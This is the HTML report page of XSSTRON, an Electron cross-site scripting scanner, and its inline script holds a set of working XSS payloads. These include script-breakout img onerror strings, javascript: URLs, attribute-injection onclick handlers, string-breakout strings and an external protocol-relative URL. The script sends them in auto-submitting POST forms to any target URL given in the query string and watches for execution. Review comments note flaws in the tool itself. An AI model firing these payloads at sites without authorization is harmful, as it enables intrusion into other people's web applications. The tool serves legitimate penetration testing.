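<!DOCTYPE html>
<!-- Report window for the probe runner in the inline script below. The headings are
     empty here and are filled in by script from this page's own query string. -->
<html lang="en">
<head>
<meta charset="utf-8">
<title>XSSTRON</title>
</head>
<body>
<!-- The id values are referenced by the script (top.xsx, getElementById('h5' / 'h52')); keep them.
     The original markup opened <center> twice and closed it once; a single wrapper gives the same layout. -->
<center>
<h3 style="color:magenta;font-size: 30px;">XSSTRON</h3>
<h3 id="xsx" style="color:rgb(255, 0, 0);font-size: 25px;"></h3>
<h5 id="h5" style="color:rgb(1, 18, 255);font-size: 20px;"></h5>
<h5 id="h52" style="color:rgb(0, 255, 55);font-size: 20px;"></h5>
</center>
<script>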
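// Probe strings handed to cw() as the value of every form input. Each one
// contains a top.pinghost(...) call, which is what the preload script listens for.
var htmlp = `javascript:/*xssx'">--></noscript></title></textarea></style></template></noembed><\/script><img src=x onerror=pinghost(1)//>*/;top.pinghost(2)//`
var jsj = `javascript:top.pinghost(1)`
var atrx = `x id=clx onclick=top.pinghost(1)// `
var atrx1 = `' id="clx" onclick="top.pinghost(1)//"" '`
var atrx2 = `" id=clx onclick=top.pinghost(1)// "`
var jsp1 = `'-top.pinghost(1)-'`
var jsp2 = `"-top.pinghost(1)-"`
var jsp3 = `\`-\${top.pinghost(1)}-\``
var ujs1 = `///xsstron.herokuapp.com/x.php`
// Inputs for this run, read from the page's own address bar: the target URL (j)
// and the '&'-separated parameter list (jd). Both are untrusted text.
var j = new URL(location).searchParams.get('shqlipqli')
var jd = new URL(location).searchParams.get('shqlipqlip')
// Writes "<label><span>value</span>" into the element with the given id using
// textContent rather than innerHTML, so a crafted address-bar value cannot inject
// markup or script into this (Electron-hosted) report page.
// String(value) keeps the original rendering of a missing parameter ("null").
function renderLabel(id, label, value) {
var host = document.getElementById(id)
host.textContent = label
var span = document.createElement('span')
span.style.color = 'black'
span.textContent = String(value)
host.appendChild(span)
}
renderLabel('h5', 'URL Tested: ', j)
// decodeURIComponent throws URIError on malformed escapes, as the original did.
renderLabel('h52', 'Parameters Tested: ', decodeURIComponent(jd))
var w;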
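// Escapes the five HTML-significant characters so `unsafe` can be placed in
// markup (element text or a quoted attribute value) without being parsed.
// Returns a new string; throws if `unsafe` is not a string (as before).
// The chained .replace() calls this replaces mapped each character to itself,
// so the function previously returned its input unchanged and escaped nothing.
function escapeHtml(unsafe) {
var entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
// One pass over a character class; '&' is included so the output contains no
// bare ampersand that a later decode could turn back into markup.
return unsafe.replace(/[&<>"']/g, function(ch) { return entities[ch]; });
}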
// Run-wide flags shared with cw(): state is set to 1 when a probe reports a hit,
// and swich is cleared to 0 at the same time so later probes do nothing.
var state = 0, swich = 1;
// Runs one probe: builds a data: URL holding an auto-submitting POST form that
// sends payload v in every parameter named in z to target x, then loads it in an
// Electron <webview> with ./d.js as preload. A hit is signalled by an 'ipc-message'
// event on that webview (presumably raised by d.js when pinghost() runs in the guest).
//   x - target URL (callers pass j, taken from this page's query string)
//   y - probe mode; 23 is meant to also click the injected href/onclick element
//   z - '&'-separated parameter list; only the names before '=' are used
//   v - payload string placed in every form input
// Side effects: appends a webview to document.body, may resize, focus or close the
// window, and writes the outer-scope flags state and swich.
function cw(x,y,z,v){
var queryDict = {}
// Each "name=value" item becomes a key; the value is never read below.
z.split("&").forEach(function(item) {queryDict[item.split("=")[0]] = item.split("=")[1]})
var px='';
for (var key in queryDict) {
if (queryDict.hasOwnProperty(key)) {
// NOTE(review): '"" value=' emits a stray quote (name="key"" value="..."); browsers
// tolerate it, but it is not valid markup. key is not escaped, only v.
px+='<input name="'+key+'"" value="'+escapeHtml(v)+'">'
}}
// Form plus auto-submit script, base64-encoded into a data: URL. The
// "#shetajyanmx" fragment marks the request and is stripped again when reporting.
var url = `data:text/html;base64,${btoa(`<form action=${x+"#shetajyanmx"} method=POST>${px}<input type=submit></form><script>document.forms[0].lastElementChild.click()<\/script>`)}`
// swich is cleared on the first hit, so every later probe is a no-op.
if(swich){
// This `let w` shadows the outer `var w`; the outer one is never used here.
let w = document.createElement('webview')
w.setAttribute('src',url)
w.setAttribute('preload','./d.js')
w.setAttribute('id','htmlw')
// NOTE(review): enableRemoteModule exposes Electron's remote module to the guest,
// whose content after the POST is the target site's response (attacker-controlled).
// If d.js does not need it, dropping this attribute shrinks the tool's own attack surface.
w.setAttribute('enableRemoteModule','true')
document.body.appendChild(w)
w.addEventListener('ipc-message', event => {
// NOTE(review): `urls` is assigned without var/let and becomes an implicit global.
// The report rewrites pinghost -> alert so the shown data: URL is self-contained.
urls=atob((url).split(',')[1]).replaceAll('pinghost','alert').replaceAll('#shetajyanmx','')
window.resizeTo(800, 600);
// escapeHtml() wraps the shown value; it only does anything if escapeHtml actually escapes.
top.xsx.innerHTML+='XSS Found : <span style="color:black"><br><textarea style=font-size:17px rows=10 cols=70>data:text/html;base64,'+escapeHtml(decodeURIComponent(btoa(urls)))+'</textarea></span><br>'
state=1;
swich=0;
window.focus();
alert('XSS Found')
})
// No hit within 6.5 s: close the window.
setTimeout(function(){
if(!state){
window.close();
}},6500);
// NOTE(review): `y=23` assigns rather than compares, so this condition is always
// truthy and the else branch below never runs. If `y==23` was intended, probes called
// with y=null would instead have their webview removed after 1 s - confirm the intended
// timing before changing it.
if(y=23){
w.addEventListener('dom-ready', () => {
setTimeout(function(){
// Click the injected element in the guest page (href-based or onclick-based payloads).
w.executeJavaScript(`var x= document.querySelector("[href^='javascript:/']"); if(x){x.click()}`)
w.executeJavaScript(`var x= document.querySelector('[onclick*=top]');if(x){x.click()}`)
}
,300);
})}
else{
setTimeout(function(){
w.remove();
},1000)
}}
}
// Start every probe after a 100 ms delay. Each entry is [mode, payload]; mode 23
// asks cw() to also click the injected element once the guest DOM is ready.
setTimeout(() => {
var probes = [
[null, htmlp],
[null, jsj],
[23, atrx],
[23, atrx1],
[23, atrx2],
[null, jsp1],
[null, jsp2],
[null, jsp3],
[null, ujs1]
]
probes.forEach(function(probe) { cw(j, probe[0], jd, probe[1]) })
}, 100);
</script>
</body>
</html>